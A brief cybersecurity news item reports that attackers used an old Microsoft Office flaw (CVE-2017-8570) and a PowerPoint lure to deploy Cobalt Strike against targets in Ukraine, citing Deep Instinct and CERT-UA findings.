Network Security, Vulnerability Management, Threat Intelligence

Old Microsoft Office bug leveraged to compromise Ukraine

Laptop computer displaying logo of Microsoft PowerPoint, a presentation program, part of the Office family software and services developed by Microsoft

Ukraine had its systems subjected to attacks involving the exploitation of an almost seven-year-old Microsoft Office remote code execution vulnerability, tracked as CVE-2017-8570, to facilitate Cobalt Strike deployment late last year, reports The Hacker News.

Intrusions commenced with the distribution of a PowerPoint file of an old U.S. Army mine clearing blade manual believed to have been shared through the Signal instant messaging app that includes a script for leveraging the high-severity Office flaw, a report from Deep Instinct revealed. Such a script then enables a JavaScript code-containing HTML file, allowing not only persistence but also a Cisco AnyConnect VPN client-spoofing payload that eventually results in a Cobalt Strike compromise.

Uncertainties in the attack campaign remain as while the lures may have targeted military personnel, attackers leveraged domains unrelated to the military industry, according to researchers. The findings follow a report from Ukraine's Computer Emergency Response Team detailing attacks by a sub-cluster of the Russian state-backed threat operation Sandworm against almost 20 critical infrastructure entities across the country.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.